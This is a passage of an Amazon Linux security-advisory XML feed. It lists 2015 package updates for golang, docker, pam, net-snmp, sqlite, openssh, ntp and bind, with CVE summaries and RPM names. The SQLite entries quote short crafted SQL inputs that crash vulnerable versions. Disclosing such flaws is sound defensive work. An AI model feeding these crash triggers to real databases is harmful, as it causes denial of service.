</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0202" title="" id="CVE-2015-0202" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0248" title="" id="CVE-2015-0248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0251" title="" id="CVE-2015-0251" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn" version="1.8.13" release="7.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.13-7.50.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.13" release="7.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.8.13-7.50.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.13" release="7.50.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.13-7.50.amzn1.i686.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.13" release="7.50.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.8.13-7.50.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.8.13" release="7.52.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/subversion-javahl-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.13" release="7.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.8.13-7.52.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.13" release="7.52.amzn1" epoch="0" 
arch="i686"><filename>Packages/subversion-ruby-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.8.13-7.52.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.13" release="7.52.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.13-7.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-588</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-588: medium priority package update for golang docker</title><issued date="2015-08-24 22:29:00" /><updated date="2015-08-24 22:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5741:
1250352:
CVE-2015-5739 CVE-2015-5740 CVE-2015-5741 golang: HTTP request smuggling in net/http library
CVE-2015-5740:
1250352:
CVE-2015-5739 CVE-2015-5740 CVE-2015-5741 golang: HTTP request smuggling in net/http library
CVE-2015-5739:
1250352:
CVE-2015-5739 CVE-2015-5740 CVE-2015-5741 golang: HTTP request smuggling in net/http library
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5739" title="" id="CVE-2015-5739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5740" title="" id="CVE-2015-5740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5741" title="" id="CVE-2015-5741" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-pkg-plan9-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-plan9-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang" version="1.4.2" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.4.2-3.16.amzn1.x86_64.rpm</filename></package><package name="golang-pkg-netbsd-arm" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-arm-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-windows-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-windows-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-openbsd-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-openbsd-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-windows-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-windows-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-openbsd-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-openbsd-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package 
name="golang-pkg-darwin-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-darwin-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-bin-linux-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-pkg-bin-linux-amd64-1.4.2-3.16.amzn1.x86_64.rpm</filename></package><package name="golang-pkg-freebsd-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-linux-arm" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-arm-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-darwin-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-darwin-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-netbsd-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-linux-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-386-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-netbsd-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-linux-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-arm" version="1.4.2" release="3.16.amzn1" epoch="0" 
arch="noarch"><filename>Packages/golang-pkg-freebsd-arm-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-plan9-amd64" version="1.4.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-plan9-amd64-1.4.2-3.16.amzn1.noarch.rpm</filename></package><package name="golang-pkg-bin-linux-386" version="1.4.2" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/golang-pkg-bin-linux-386-1.4.2-3.16.amzn1.i686.rpm</filename></package><package name="golang" version="1.4.2" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.4.2-3.16.amzn1.i686.rpm</filename></package><package name="docker" version="1.6.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.6.2-1.3.amzn1.x86_64.rpm</filename></package><package name="docker-devel" version="1.6.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-devel-1.6.2-1.3.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.6.2" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-pkg-devel-1.6.2-1.3.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-589</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-589: medium priority package update for pam</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3238:
It was discovered that the _unix_run_helper_binary() function of PAM's unix_pam module could write to a blocking pipe, possibly causing the function to become unresponsive. An attacker able to supply large passwords to the unix_pam module could use this flaw to enumerate valid user accounts, or cause a denial of service on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3238" title="" id="CVE-2015-3238" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1640.html" title="" id="RHSA-2015:1640" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam-devel" version="1.1.8" release="12.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-devel-1.1.8-12.32.amzn1.x86_64.rpm</filename></package><package name="pam" version="1.1.8" release="12.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-1.1.8-12.32.amzn1.x86_64.rpm</filename></package><package name="pam-debuginfo" version="1.1.8" release="12.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-debuginfo-1.1.8-12.32.amzn1.x86_64.rpm</filename></package><package name="pam-devel" version="1.1.8" release="12.32.amzn1" epoch="0" arch="i686"><filename>Packages/pam-devel-1.1.8-12.32.amzn1.i686.rpm</filename></package><package name="pam" version="1.1.8" release="12.32.amzn1" epoch="0" arch="i686"><filename>Packages/pam-1.1.8-12.32.amzn1.i686.rpm</filename></package><package name="pam-debuginfo" version="1.1.8" release="12.32.amzn1" epoch="0" arch="i686"><filename>Packages/pam-debuginfo-1.1.8-12.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-590</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-590: medium priority package update for net-snmp</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5621:
It was discovered that the snmp_pdu_parse() function could leave incompletely parsed varBind variables in the list of variables. A remote, unauthenticated attacker could use this flaw to crash snmpd or, potentially, execute arbitrary code on the system with the privileges of the user running snmpd.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5621" title="" id="CVE-2015-5621" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1636.html" title="" id="RHSA-2015:1636" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="net-snmp-libs" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-libs-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-python" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-python-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-debuginfo-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-perl-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-utils-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="54.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-devel-5.5-54.1.20.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-devel-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-libs-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="54.1.20.amzn1" epoch="1" 
arch="i686"><filename>Packages/net-snmp-utils-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-python-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-debuginfo-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-5.5-54.1.20.amzn1.i686.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="54.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-perl-5.5-54.1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-591</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-591: medium priority package update for sqlite</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3416:
The sqlite3VXPrintf function in printf.c in SQLite before 3.8.9 does not properly handle precision and width values during floating-point conversions, which allows context-dependent attackers to cause a denial of service (integer overflow and stack-based buffer overflow) or possibly have unspecified other impact via large integers in a crafted printf function call in a SELECT statement.
It was found that SQLite's sqlite3VXPrintf() function did not properly handle precision and width values during floating-point conversions. A local attacker could submit a specially crafted SELECT statement that would crash the SQLite process, or have other unspecified impacts.
1212357:
CVE-2015-3416 sqlite: stack buffer overflow in src/printf.c
CVE-2015-3415:
The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, which allows context-dependent attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via a crafted CHECK clause, as demonstrated by CHECK(0&amp;O&gt;O) in a CREATE TABLE statement.
It was found that SQLite's sqlite3VdbeExec() function did not properly implement comparison operators. A local attacker could submit a specially crafted CHECK statement that would crash the SQLite process, or have other unspecified impacts.
1212356:
CVE-2015-3415 sqlite: invalid free() in src/vdbe.c
CVE-2015-3414:
SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, which allows context-dependent attackers to cause a denial of service (uninitialized memory access and application crash) or possibly have unspecified other impact via a crafted COLLATE clause, as demonstrated by COLLATE"""""""" at the end of a SELECT statement.
A flaw was found in the way SQLite handled dequoting of collation-sequence names. A local attacker could submit a specially crafted COLLATE statement that would crash the SQLite process, or have other unspecified impacts.
1212353:
CVE-2015-3414 sqlite: use of uninitialized memory when parsing collation sequences in src/where.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414" title="" id="CVE-2015-3414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415" title="" id="CVE-2015-3415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3416" title="" id="CVE-2015-3416" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sqlite-doc" version="3.7.17" release="6.13.amzn1" epoch="0" arch="noarch"><filename>Packages/sqlite-doc-3.7.17-6.13.amzn1.noarch.rpm</filename></package><package name="sqlite" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sqlite-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="sqlite-devel" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sqlite-devel-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="lemon" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/lemon-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="sqlite-tcl" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sqlite-tcl-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="sqlite-debuginfo" version="3.7.17" release="6.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sqlite-debuginfo-3.7.17-6.13.amzn1.x86_64.rpm</filename></package><package name="sqlite-tcl" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/sqlite-tcl-3.7.17-6.13.amzn1.i686.rpm</filename></package><package name="sqlite" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/sqlite-3.7.17-6.13.amzn1.i686.rpm</filename></package><package name="sqlite-devel" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/sqlite-devel-3.7.17-6.13.amzn1.i686.rpm</filename></package><package name="lemon" 
version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/lemon-3.7.17-6.13.amzn1.i686.rpm</filename></package><package name="sqlite-debuginfo" version="3.7.17" release="6.13.amzn1" epoch="0" arch="i686"><filename>Packages/sqlite-debuginfo-3.7.17-6.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-592</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-592: medium priority package update for openssh</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6564:
Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request.
1252852:
CVE-2015-6564 openssh: Use-after-free bug related to PAM support
CVE-2015-6563:
The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c.
1252844:
CVE-2015-6563 openssh: Privilege separation weakness related to PAM support
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6563" title="" id="CVE-2015-6563" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6564" title="" id="CVE-2015-6564" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.2p2-8.45.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.45.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.45.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.45.amzn1" 
epoch="0" arch="i686"><filename>Packages/openssh-server-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.2p2-8.45.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.45.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.2p2-8.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-593</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-593: low priority package update for ntp</title><issued date="2015-09-02 12:00:00" /><updated date="2016-02-09 13:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7703:
1254547:
CVE-2015-7703 ntp: config command can be used to set the pidfile and drift file paths
CVE-2015-5219:
1255118:
CVE-2015-5219 ntp: infinite loop in sntp processing crafted packet
CVE-2015-5195:
1254544:
CVE-2015-5195 ntp: ntpd crash when processing config commands with statistics type
CVE-2015-5194:
1254542:
CVE-2015-5194 ntp: crash with crafted logconfig configuration command
CVE-2015-5146:
1238136:
CVE-2015-5146 ntp: ntpd control message crash on crafted NUL-byte in configuration directive (VU#668167)
CVE-2015-3405:
A flaw was found in the way the ntp-keygen utility generated MD5 symmetric keys on big-endian systems. An attacker could possibly use this flaw to guess generated MD5 keys, which could then be used to spoof an NTP client or server.
1210324:
CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3405" title="" id="CVE-2015-3405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5146" title="" id="CVE-2015-5146" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5194" title="" id="CVE-2015-5194" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5195" title="" id="CVE-2015-5195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5219" title="" id="CVE-2015-5219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703" title="" id="CVE-2015-7703" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-doc" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-33.26.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-33.26.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-33.26.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-33.26.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-33.26.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-33.26.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="33.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-33.26.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="33.26.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-33.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-594</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-594: critical priority package update for bind</title><issued date="2015-09-02 12:00:00" /><updated date="2015-09-02 13:05:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5722:
Embargoed
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722" title="" id="CVE-2015-5722" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-sdb" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.39.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" 